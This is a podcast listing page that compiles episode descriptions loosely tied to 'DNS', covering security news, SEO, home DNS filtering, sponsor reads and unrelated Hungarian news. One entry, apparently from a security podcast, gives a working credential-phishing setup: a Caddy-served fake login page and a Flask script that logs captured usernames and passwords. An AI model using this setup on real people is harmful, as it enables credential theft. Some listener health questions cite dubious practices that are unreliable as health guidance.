Podcasts about dns

Aztec releases a local testnet for private smart contracts. L2Beat introduces a new TVL framework. Balancer suffers a DNS highjack attack And the Holesky testnet is set to relaunch on September 28th.

Last week in security news: Corey reported an over-scoped role to AWS security, The bad LastPass breach got even worse, How to enforce DNS name constraints in AWS Private CA, and more!Links: I reported an over-scoped role to AWS security; the response from the SageMaker Canvas team was that it's working as intended. The bad LastPass breach that continues to get worse once again somehow got worse. Microsoft has published a rather thorough postmortem about how their signing key was leaked. A security newsletter features a scam that I reported via Twitter. Google has gone from paragon of security to apparently now sharing aspects of your browsing history with websites in Chrome, Establishing a data perimeter on AWS: Allow access to company data only from expected networks  How to enforce DNS name constraints in AWS Private CA  Tool of the week: ThreatMapper hunts for threats in your production platforms, and ranks these threats based on their risk-of-exploit.

Old SEO vs New SEO is a big topic for discussion! This episode will get you straight. Read this article on Old SEO vs New SEO for more details. --------- EPISODE SUMMARY --------- Prepare to amplify your online presence like never before. As we dive into the heart of Search Engine Optimization, you'll acquire the tools and knowledge to make your website a magnetic force for your target audience. Strap in, as we embark on a comprehensive journey through the evolution of SEO, from old to new strategies, exploring how to use your website to drive more traffic, enhance visibility, and ultimately, grow your business. We'll unleash insights into the intricate world of SEO - keyword optimization, website management, DNS records and more, all tailored to propel your business onto the forefront of search engine results. We'll discuss the power of compelling content and the importance of an organized page structure. Learn how to add context to your articles, how to make your business stand out with a 'word cloud,' and how to protect your domain as a valuable asset. But we're not just about the technicalities. We also delve into the human side of SEO. We'll show you how to make your website inviting to visitors, how to use filters effectively, how to solve a problem for your audience, and how to write articles that will rank organically. By the end of this episode, whether you're a beginner or an SEO expert, you'll have unlocked a treasure trove of SEO wisdom that will transform your online business. So, what are you waiting for? Let's get started! --------- EPISODE CHAPTERS WITH SHORT KEY POINTS --------- (0:00:03) - Exploring Old and New SEO Strategies We discuss SEO, building a house to express feelings, using filters to position in search, and thanking Rocky for his service. (0:05:59) - The Evolution of SEO Strategies We discuss filters, content pillars, page structure, time management, and digital marketing strategies. (0:19:33) - New SEO and Keyword Optimization Way Word clouds help businesses be seen, compare options, create content to rank higher, and automate decisions. (0:27:43) - SEO and URL for Business Growth We create commercial assets to build value, create content, solve problems, and increase website awareness. (0:35:56) - Optimizing SEO for Personal Branding We analyze keywords in SEO to increase visibility, create content with key phrases, and use a "word cloud" to build value. (0:49:12) - The Importance of Owning Your Domain Owning a domain, subdomains, exact match domains, hosting platforms, digital real estate, Google Search Console, content pillars, page structure, and multiple assets are discussed to build an online presence. (0:56:30) - Understanding SEO and Website Management We explore the importance of domain ownership, keywords, and commercial assets for SEO success. (1:04:15) - Understanding DNS Records and Name Servers We discuss domain and name servers, DNS records, A records, MX records, TXT records, CNAME records, and name servers for secure domain functionality. --------- EPISODE KEYWORDS --------- SEO, Website Management, Domain, DNS Records, Name Servers, Keyword Optimization, Content Pillars, Page Structure, Word Cloud, Filters, Problem Solving, Organic Ranking, Commercial Assets, Domain Ownership, Digital Real Estate, Google Search Console, A Records, MX Records, TXT Records, CNAME Records NEW SEO COURSE RELEASED The ⁠⁠⁠⁠⁠Demystifying SEO mini-course⁠⁠⁠⁠⁠ is designed to provide marketers and business owners with a clear understanding of the significance of ⁠⁠⁠⁠⁠SEO & CRO⁠⁠⁠⁠⁠ in driving organic traffic with sales for higher website visibility & conversions. Email me at ⁠⁠⁠⁠⁠⁠favour@playinc.online⁠⁠⁠⁠⁠⁠ ⁠⁠⁠⁠⁠⁠Grab My Virtual Business Card here⁠⁠⁠⁠⁠⁠: ⁠⁠⁠⁠⁠⁠https://poplme.co/hash/lQZ4jOcr/2/s⁠⁠⁠⁠⁠⁠ --- Send in a voice message: https://podcasters.spotify.com/pod/show/wedontplay/message

Is your DNS a security risk, or are you taking advantage of its strengths as a security tool? In this episode of ThreatTalk, we talk with Josh Kuo and Ross Gibson about their new security book titled “The Hidden Potential of DNS in Security.” The first of a 3-part series, we will discuss highlights from the book and the use cases that drove them to produce such a comprehensive reference on a commonly overlooked security resource. Learn more about The Hidden Potential of DNS in Security: https://a.co/d/dsE2gypTune in to the live broadcast on LinkedIn and Facebook every first and third Tuesday of the month at 11:00 am (PST). Subscribe to the ThreatTalk podcast on Apple Podcasts, Spotify, SoundCloud, PocketCasts or your favorite podcast app.

Adventures in Pi-Hole Hi all! Today I'm gonna be talking about my adventures in setting up Pi-hole. This will be without screenshots, but instead in all text, sorry! Also this is all written as kind of an "Aftermath" story. This is being written after the fact, so this might be missing some details, but most of it is there. Intro: What is Pi-hole Pi-hole is a DNS/DHCP server that allows for easy network-wide ad-blocking, along with all the nice customizations that come with being a DNS server, such as custom domains. First Step: Get it running The first step was getting Pi-hole running. I did this using Docker Compose on a "NAS" which is honestly a full on server at this point. A quick copy/paste from Pi-hole's README and I was up and running! I set a singular system to use this as a DNS server, and after that, I figured I was set and ready to go. Second Step: DHCP town Of course, I wasn't satisfied just finishing there. I want automatic DNS setting for any device that connects to my network. Of course, I could just set the DNS upstream in my OpenWRT router to use the IP address of my server, but that isn't good enough for me. This means I'd be missing out on automatic per-client information, since when setting a DNS server for OpenWRT, it only sets itself to forward any DNS requests up to the DNS server, which means from Pi-hole's perspective, all the requests are coming from the router and nowhere else. The solution is to set up Pi-Hole as a DHCP server. Keep in mind this isn't a tutorial, so let's go through what I did first. The first step was to turn on the DHCP server in Pi-Hole. This was super easy, just a checkbox and click save. Cool! Then I disabled the DHCP server in OpenWRT, and that was all set. A few restarting of network devices later, like my phone, and they automatically connected to the Pi-Hole server, and worked like a charm. Next up, I set up Tailscale. I use Headscale, but the setup is essentially the same as if you were using Tailscale's UI. Set in the config to override local DNS, set the nameserver to the Tailscale IP address of the server, and turn on magic DNS, et voila! Now to restart the Tailscale nodes, and make sure that on the server, you set it to not accept the DNS from Tailscale. If you don't do that, it'll get in an endless loop of trying to use itself as the DNS server, and it's just no good. Okay! It's all set, and I check the dashboard, and it's already blocking DNS requests. Perfect! Third Step: Whoopsies! This was fine and great, but when I went to reboot my server, which I do weekly, something bad happened. The interface for the server didn't come up. This is a problem, since it's the DHCP server for my network, so without that working, the network was dead in the water. It can't give out IP addresses. What's going on? I go ahead and access my server directly. No matter how hard I try, it can't connect to the interface. What's the big deal? Well this is pretty simple, and a question popped in my head that go me there. "How does this server even get its IP address?" You see when I set up pi-hole, it just kept using the IP address that the router gave it, which it was more than happy to use, but the moment the router didn't have a DHCP server, the NAS didn't have a way to get an IP address anymore. So what do you do then? The answer is pretty simple. Give the server a static IP. Make sure in the DHCP server of pi-hole, you set a reservation in it for the server, then in NetworkManager, which I use, set it to have a static IP, and set its DNS to point to localhost. Perfect! This works like a charm! Fourth Step: Adlists Okay, phew! Crisis averted. Just some missing networking knowledge. So what's next up on the list? Hmmm... Let's see... The default adlist is kinda small, let's go see if we can find some new adlists. Apparently this is more difficult than you'd think. A quick search on DDG only came up with an equivalent search in GitHub. Not useful! I have no idea the trustworthiness and stability of these adlists. Let's see. Another search leads to a Reddit article that then links to a different list. Bingo! An Adlist list. Exactly what I needed. I went ahead and looked into these lists, and added a few of them. Perfect! Fifth Step: Maintenance docker compose pull && docker compose up -d Of course, this isn't it. I actually use an a/b update scheme, but you get the gist. Updates are taken care of, and just make sure you try and keep the server up as long as possible, and keep downtime to a minimum. Sixth Step: Moving off the NAS. After a while of running this, the necessity of having the NAS on the whole time was starting to get frustrating. The answer there was to move it off the NAS. I did this by installing it on a Raspberry Pi 3B, running Arch Linux ARM. The setup was identical to before once I had gotten ALARM running.

Yegor Sak is the co-founder of Windscribe, a free VPN and Ad Block that has over 43 million active users. With tens of thousands of competitors, Windscribe has also been rated as one of the best VPNs on the market, and they've been able to pull it off with a team of less than 40 people. Yegor started and grew Windscribe with zero outside capital and made the business profitable by month two and currently are doing around $3M in annual revenue. He was born in Belarus and didn't have access to the internet until his family moved to Canada when he was 12. Shortly after getting internet access, Yegor developed a passion for programming and creating websites, and as a teenager, he worked on several websites that earned him money. One of the first websites he created had people paying him to buy iPods and game consoles and smash them into pieces. A video he made smashing a PS3 was in the top 10 YouTube videos of all time in 2016, and over two years, this website earned him over $60,000. He is also the founder of ControlD, a fully customizable DNS service that allows you to not only block annoyances like malware, tracking, ads, or IoT telemetry but also unblock over 200 services through a network of servers in over 100 cities. All without any apps to install. Connect with Jon Dwoskin: Twitter: @jdwoskin Facebook: https://www.facebook.com/jonathan.dwoskin Instagram: https://www.instagram.com/thejondwoskinexperience/ Website: https://jondwoskin.com/LinkedIn: https://www.linkedin.com/in/jondwoskin/ Email: jon@jondwoskin.com Get Jon's Book: The Think Big Movement: Grow your business big. Very Big!   Connect with Yegor Sak: Website: https://windscribe.com/ Twitter: https://twitter.com/yegor?lang=en Instagram: https://www.instagram.com/windscribe/ LinkedIn: https://www.linkedin.com/in/yegor-sak-725330b2/ Facebook: https://www.facebook.com/windscribe/

Name collision as a DNS risk. A LockBit derivative is active against targets in Spain. QR codes as phishbait. Cybersecurity trends in Healthcare. A Russian hacktivist auxiliary hits Polish organizations, while investigation of railroad incidents in Poland continues. Ben Yelin looks at the SEC cracking down on NFTs. Mr. Security Answer Person John Pescatore opens up the listener mail bag. And a look at a probably accidental glitch affecting air travel in the UK. For links to all of today's stories check out our CyberWire daily news briefing: https://thecyberwire.com/newsletters/daily-briefing/12/164 Selected reading. What's in a name? Strange behaviors at top-level domains creates uncertainty in DNS (Cisco Talos)  Spain warns of LockBit Locker ransomware phishing attacks (BleepingComputer)  Think Before You Scan: The Rise of QR Codes in Phishing (Trustwave SpiderLabs) 78% of Healthcare Organizations Experienced Cyber Incidents in Past Year, 60% of Which Impacted Patient Care (Claroty)  Polish stock exchange, banks knocked offline by pro-Russian hackers (Cybernews)  Two Men Arrested Following Poland Railway Hacking (SecurityWeek)  Century-old technology hack brought 20 trains to a halt in Poland (Cybernews)  Poland investigates train mishaps for possible Russian connection (Washington Post)  Flight chaos ‘to last for days' after air traffic control failure (The Telegraph)  UK flight chaos could last for days, airline passengers warned (the Guardian)  Government can't rule out cyber attack caused air traffic chaos (MSN) Learn more about your ad choices. Visit megaphone.fm/adchoices

A Putyin megbízásából készült új orosz tankönyv fasisztának nevezi az 56-os forradalmárokat Telex     2023-08-27 13:42:37     Külföld Vlagyimir Putyin Iskolakezdés 1956 A putyini rezsim új tankönyve fasiszta múltú radikálisokról és nyugati operatív műveletekről beszél, amikor megemlíti a magyarokat, pontosabban 1956-ot. Emellett szól a tankönyv a Szovjetunió virágzásáról és arról, hogy emelte fel Putyin Oroszországot. A magyar Alza is elkezdte árulni a rezsicsökkentő terméket, amit megvenni ugyan lehet, de használni nem G7     2023-08-27 13:21:20     Gazdaság Egyre égetőbb lenne jogilag és műszakilag is tisztázni, hogy mit tehet a vásárló az erkélynapelemes rendszerekkel, miután most már a második legnagyobb magyar e-kereskedő is elkezdte forgalmazni. Utcanévbajnokság: Petőfi vezet Kossuth és Ady előtt 24.hu     2023-08-27 14:54:41     Belföld Mindenki megfigyelhette, hogy ha beér egy magyar településre, bizonyos utcanevekkel szinte elkerülhetetlenül találkozik. Budapesten külön érdekesség. Komoly furcsaságokat fedett fel Prigozsin gépével kapcsolatosan egy orosz lap Portfolio     2023-08-27 14:41:00     Külföld Repülőgép Prigozsin Jevgenyij Prigozsin Embraer 600-as magángépe hónapokon keresztül egy hangárban pihent, ez idő alatt ráadásul sokszor huzamosabb időre kinyitották a repülőgép utasterét – írja az MK.ru. Jó hírt kapott több millió magyar nyugdíjas: szinte biztosan kapnak emelést az idén Pénzcentrum     2023-08-27 11:30:00     Gazdaság Infláció Nyugdíj Nagyon úgy tűnik, hogy lassan pont kerülhet egy, a nyugdíjasok szempontjából fontos kérdés végére. Az elmúlt hónapokban ugyanis több millió magyar nyugdíjas várt arra, hogy eldőljön, melyik forgatókönyv érvényesül az idei inflációval kapcsolatban. Az F1-es Holland Nagydíj rajtrácsa F1világ     2023-08-27 10:58:54     Forma1 Hollandia Max Verstappen Red Bull Idei 8., Forma-1-es pályafutása 28. rajtelsőségét szerezte a Forma-1-es Holland Nagydíjon a Red Bull világbajnok versenyzője, Max Verstappen. Olaszország volt miniszterelnöke: a Nyugat Ukrajnára vonatkozó stratégiája kudarcot vallott vg.hu     2023-08-27 10:29:20     Külföld Ukrajna háború Olaszország Menekült Propaganda Giuseppe Conte Másfél év háború után mi az a valóság, ami uralkodik a háborús propaganda által lüktetett egyszerű jóslatok felett? - teszi fel a kérdést írásában Giuseppe Conte. A valóság 500 ezer ember halála mindkét fronton és több mint hatmillió ukrán menekült. Márki-Zay a kampányban megígérte Gyurcsánynak, hogy elszámoltatja HírTV     2023-08-27 12:20:00     Belföld Kampány Gyurcsány Ferenc Az ellenzék bukott miniszterelnök-jelöltje szerint törénténhettek a háta mögött pénzügyi tranzakciók. Három évvel idősebb gyermekeinél az édesanya, aki harminc éve lefagyasztott embriókat szült meg Noizz     2023-08-27 11:42:03     Életmód Adomány Kereszténység Embrió A hatgyermekes anyuka, Rachel Ridgeway technikailag három évvel idősebb, mint újszülött ikerpár gyermekei. Az 1992-ben lefagyasztott embriókat ugyanis egy keresztény adományozó központ segítségével most ültették be a fiatal lány méhébe, aki meg is szülte Timothyt és Lydiát. Rockzene, ahogy a párt szereti 444.hu     2023-08-27 14:26:08     Külföld Kína Kommunista A kommunista párt ifjúsági szervezete egyszerűen átírta az egyik legnagyobb hatású kínai indie-rock dal szövegét. A komor és csüggedt hangulatú szám optimista és pozitív lett. Ez azonban még lehangolóbb. Rajta volt Prigozsin a lezuhant gépen vagy sem? Az oroszok közzétették a DNS-vizsgálat eredményét Privátbankár     2023-08-27 13:18:04     Külföld Nyomozó Prigozsin DNS Légikatasztrófa Az utaslistán rajta volt Jevgenyij Prigozsin neve, az orosz nyomozók most megvizsgálták a maradványokat is. "Volt egyszer egy kislány Skóciában, aki valójában kisfiú volt" Büntető.com     2023-08-27 12:45:41     Foci Olaszország Skócia Női labdarúgás A női futball egyik úttörője Rose Reilly. A skót hölgy, akit senki nem tudott megállítani abban, hogy beteljesítse álmát, és futballista legyen. Összesen kilencszer nyert olasz bajnokságot, 1978-ban és 1981-ben pedig gólkirálynő is lett. F1: Hiába tarol, bukhatja a hazai futamot Verstappen Vezess     2023-08-27 11:44:17     Forma1 Hollandia Max Verstappen Hiába óriási siker a Holland Nagydíj, lehetséges, hogy 2025 után csak kétévente rendezik majd meg, mondta a Forma-1 vezérigazgatója. Már nem kell sokáig várnunk a felfrissülésre Kiderül     2023-08-27 13:05:23     Időjárás Kánikula Hétfőn még országszerte hőségre kell számítanunk, majd kedden egy hidegfront vonul át hazánk felett, amelynek hatására a hét közepére véget ér az augusztusi hőhullám hazánkban.

Another piping-hot batch of questions is here straight out of the oven (where "the oven" is Discord and our inbox), and we do our best to deliver answers about amassing a collection of Allen wrenches, the seeming fragility of OLED panels, service-nagging from your smart appliances, running dynamic DNS for your home VPN, books about computer history, peated whiskey, and more!Support the Pod! Contribute to the Tech Pod Patreon and get access to our booming Discord, your name in the credits, and other great benefits! You can support the show at: https://patreon.com/techpod

Thank you for joining us for our 2nd Cabral HouseCall of the weekend! I'm looking forward to sharing with you some of our community's questions that have come in over the past few weeks…   Stacey: Hi Dr. Cabral , I hope you are having a wonderful day ! I have a quick question for ya . What Is your opinion on Metformin? My functional medicine Dr. / endocrinologist prescribed it to me to help with insulin resistance & some of my dysautonomia symptoms like sensory sensitivity ect .. I've been reading the book lifespan from Dr. David Sinclair and he brings up Amazing things Metformin is used for and in some counties you don't even need a prescription for it ect … I found it to be very interesting and I'm considering trying it but still nervous . Have you dug deep in the metformin rabbit hole ? What's your opinion? Thanks for everything.   Ryan: Hello Dr. Cabral , I want you to know I'm learning so much from you and I'm extremely thankful! I have a question for you on your opinion of medical Mediums approach to healing with all that fruit ? Im learning a lot from you and have done several protocols as well as detoxing and Fatlosity. I still have issues with a fatty liver , hypothyroidism, hormonal imbalances ect … Some have been sharing their healing through medical Mediums protocols & detoxes even through your group page .. I bought his books and a lot makes sense, yet eating all of that fruit being pre diabetic sits hard with me .,… even though he claims it will reverse all these conditions. I'm confusing myself with all the different books I read , pos casts ect .. I have done your big 5 labs   Robert: Hi Dr Cabral. I have found your podcasts incredibly valuable, so thank you so much for all you do, it is very much appreciated. I recently went to Acupuncture and did a Quantum Resonance Magnetic Analyzer Handheld Health Detector Analyzer which showed i have a moderate level of Rheumatoid Arthritis coefficient. I don't have the symptoms of RA, but my acupuncturist believes i might be pre-RA. I have very high anxiety as shown on a OAT, so am working on reducing that and have ordered the CBO protocol. I would be interested in hearing your story of how you recovered. Did you have joint pain with your RA or did you just have pre-RA? were you on medication too before you healed naturally? Any other advise for me to not go from pre-RA to RA? Thank you again!   Robert: Sorry Dr cabral, me again. Just a follow up from question….. as you haven't had RA for a long time now, does it still show up in your blood test (I.e. elevated ESR), or does your blood test show no signs of the disease? Thanks again   Amanda: Hello Dr. I am 34 y.o dentist vata type. I suffer from many floaters, tinnea versica, white spots on nails, and a left ear that always pounds/heart beat audible. I have a weird tingling between should blades right after eating. If I eat cruciferous veggies daily @ 1 serving, my palms and soles turn bright YELLOW, and turned yellow while pregnant 2 years ago. Milk thistles and liver herbs also cause tingling in my back. Tried the DNS for 4 months (and 21 day detox) but it didn't help the yellowing. I Did your liver flush once and passed hundreds of stones. Why would one turn yellow after crucifers? Are they not good for me?or Do you think phase I , II or 2.5 detox is impaired? If you could provide any explanation about the yellowing and/or solutions and root causes for my symptoms? Thanks!   Thank you for tuning into this weekend's Cabral HouseCalls and be sure to check back tomorrow for our Mindset & Motivation Monday show to get your week started off right! - - - Show Notes and Resources: StephenCabral.com/2760 - - - Get a FREE Copy of Dr. Cabral's Book: The Rain Barrel Effect - - - Join the Community & Get Your Questions Answered: CabralSupportGroup.com - - - Dr. Cabral's Most Popular At-Home Lab Tests: > Complete Minerals & Metals Test (Test for mineral imbalances & heavy metal toxicity) - - - > Complete Candida, Metabolic & Vitamins Test (Test for 75 biomarkers including yeast & bacterial gut overgrowth, as well as vitamin levels) - - - > Complete Stress, Mood & Metabolism Test (Discover your complete thyroid, adrenal, hormone, vitamin D & insulin levels) - - - > Complete Food Sensitivity Test (Find out your hidden food sensitivities) - - - > Complete Omega-3 & Inflammation Test (Discover your levels of inflammation related to your omega-6 to omega-3 levels) - - - Get Your Question Answered On An Upcoming HouseCall: StephenCabral.com/askcabral - - - Would You Take 30 Seconds To Rate & Review The Cabral Concept? The best way to help me spread our mission of true natural health is to pass on the good word, and I read and appreciate every review!  

In this episode, we dive into the world of WordPress and web infrastructure, exploring the often mysterious realm of DNS settings.

https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

https://www.GoodMorningGwinnett.com Listen to the show Monday-Thursday at 10am. Learn all about people and places around Gwinnett County. Hey if you're enjoying the show, horoscope & morning inspiration, help me keep up the good feelings by buying me a cup of coffee. Just click the link below. https://www.buymeacoffee.com/AudreyBK___________________________________________**Embracing Change: The Emotional Landscape of DNS Migration**Changing the DNS of your website is not just a technical shift; it's an emotional journey that mirrors life's ups and downs. Anticipation blends with uncertainty as you embark on enhancing your online presence. Nostalgia for the old system mingles with the need to let go, while fear of disruption battles with a newfound sense of empowerment. Frustration arises from technical hiccups, but each challenge becomes a chance to learn and grow.With the migration's completion, relief washes over you, transitioning into a profound feeling of achievement. As the new DNS settles in, adaptation takes hold – you're exploring a new digital landscape, fortified by the resilience gained from weathering the storm of change. This process, a delicate dance of emotions and technicalities, underlines the commitment you hold for a seamless online experience. Ultimately, the DNS migration journey is a testament to your ability to navigate change's tumultuous waters while crafting an even stronger digital presence.

Episode hors-série : Souveraineté Numérique. Partie 1 : DNS, Routage et noms de domaine Avec Stéphane Bortzmeyer    The post Hors Série – Souveraineté Numérique – DNS et routage appeared first on NoLimitSecu.

IntroductionIn this episode, we'll be discussing domain name registrars. We'll talk about what they are, how they work, and how to choose the best one for your needs.What is a domain name registrar?A domain name registrar is a company that registers and sells domain names. When you buy a domain name from a registrar, you're essentially renting it for a certain amount of time. The registrar is responsible for keeping track of who owns the domain name and making sure that it's properly pointed to your website.How do domain name registrars work?When you buy a domain name from a registrar, they'll add your name and contact information to a database called the Domain Name System (DNS). The DNS is a big list of all the domain names in the world and their corresponding IP addresses. When someone types your domain name into their browser, their computer will query the DNS to find the IP address of your website.How to choose the best domain name registrar for youThere are a few factors to consider when choosing a domain name registrar. These include:Price: Domain name registrars typically charge different prices for domain names. It's important to compare prices before you buy a domain name.Features: Different registrars offer different features, such as free domain privacy, email forwarding, and DNSSEC. Make sure to choose a registrar that offers the features you need.Customer support: If you have any problems with your domain name, you'll need to contact the registrar's customer support team. Make sure to choose a registrar with a good reputation for customer support.Popular domain name registrarsHere are some of the most popular domain name registrars:Domain.comNamecheapBluehostGoogle DomainsGoDaddyHostGatorName.comNameSiloDynadotDreamHosthttps://url.amit.so/bio

Why Linux reigns for privacy; our recommendations for secure tools from chat to DNS.

Big thanks to my sponsors for helping support the podcast! :) BetterHelp: This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS during sign up. Factor: Head to FactorMeals.com/nosleeppod50 today and use code nosleeppod50 to get 50% off! * * *

Why Linux reigns for privacy; our recommendations for secure tools from chat to DNS.

https://youtu.be/c-bDpZoG--whttps://open.lbry.com/@NaomiBrockwell:4/pfsense-deep-dive:5Consumer grade routers are like leaky boats. But you can beef up your setup using things like the pfSense open source router and firewall software. In previous videos we've looks specifically at DNS settings, and programs like "Unbound" within pfSense. While these grant you granular control over your home network, they can also be confusing.This video dives deeper into "Unbound", the DNS resolver on pfSense, and explains what each of its many settings means so that you can get a better understanding of just what it's capable of.00:00 Intro01:09 DNS/pfSense Recap02:22 Unbound Settings Explained11:00 DNS Forwarder Explained11:38 ConclusionpfSense is a great tool that gives your router a power-up, enabling greater control, enhancing security, and the ability to set up more privacy for your internet activities. Special Thanks to John Todd for guiding us through the tutorial process!More information on Quad9:https://quad9.net/Brought to you by NBTV team members: Lee Rennie, Sam Ettaro, Cube Boy, Reuben Yap, Will Sandoval and Naomi BrockwellTo support NBTV, visit https://www.nbtv.media/support(tax-deductible in the US)NBTV's new eBook out now!Beginner's Introduction To Privacy - https://amzn.to/3WDSfkuBeware of scammers, I will never give you a phone number or reach out to you with investment advice. I do not give investment advice.Visit the NBTV website:https://nbtv.mediaSupport the show

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile: domain.com Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal: Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; } User Name: Password: Unauthorized use is prohibited! This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher: from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000) If you don't have Flask installed, do this: sudo apt install python3-pip -y sudo pip install Flask Run this file in one session, then in your index.html file make a small tweak in the form action directive: Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Based out of sunny San Diego, Dr. Michael Rintala operates a private practice and holds a unique blend of qualifications. He first gained his BA in Psychology before diving into the world of chiropractic medicine. His holistic approach to patient care has been greatly influenced by the Prague School of Rehabilitation, where he has been studying the principles and techniques of Dynamic Neuromuscular Stabilization. Stay tuned as we dive into how he leverages DNS within his own sports-focused practice.

Big thanks to my sponsors for helping support the podcast! :) Factor: Head to FactorMeals.com/nosleeppod50 today and use code nosleeppod50 to get 50% off! BetterHelp: This episode is brought to you by BetterHelp. Go to betterhelp.com/dns today to get 10% off your first month. Be sure to use promo code DNS during sign up. * * *

Ralph Bonnell did a great session on DNS as a CheckMates TechTalk. You can access the materials (including some Q&A) here.

https://youtu.be/pURzvhYQ2FQhttps://open.lbry.com/@NaomiBrockwell:4/DNS-Blocklists:3These days, trackers infiltrate nearly every webpage. Advertisements demand your attention and monitor your online movements. Your own devices and software send telemetry back to manufacturers and developers, leaking all kinds of information about your activities. DNS blocklists can help you regain control over your network traffic. They can stop your devices from ever connecting to certain data tracking sites, malicious content, or servers that collect telemetry.In this video, we explain exactly how they work, and how to set them up on your home network using the open source router and firewall software, pfSense.00:00 Intro00:53 Understanding DNS Blocklists02:32 Setting Up DNS Blocklists13:36 Note for Quad9 Users14:17 The Looming Threat15:12 ConclusionDNS blocklists and the reports they generate are a great way to become more aware of how our data is being collected and our privacy invaded without us realizing.Special Thanks to John Todd for guiding us through the tutorial process!More information about Quad9:https://quad9.net/Brought to you by NBTV team members: Lee Rennie, Sam Ettaro, Cube Boy, Will Sandoval and Naomi BrockwellTo support NBTV, visit https://www.nbtv.media/support(tax-deductible in the US)NBTV's new eBook out now!Beginner's Introduction To Privacy - https://amzn.to/3WDSfkuBeware of scammers, I will never give you a phone number or reach out to you with investment advice. I do not give investment advice.Visit the NBTV website:https://nbtv.mediaSupport the show

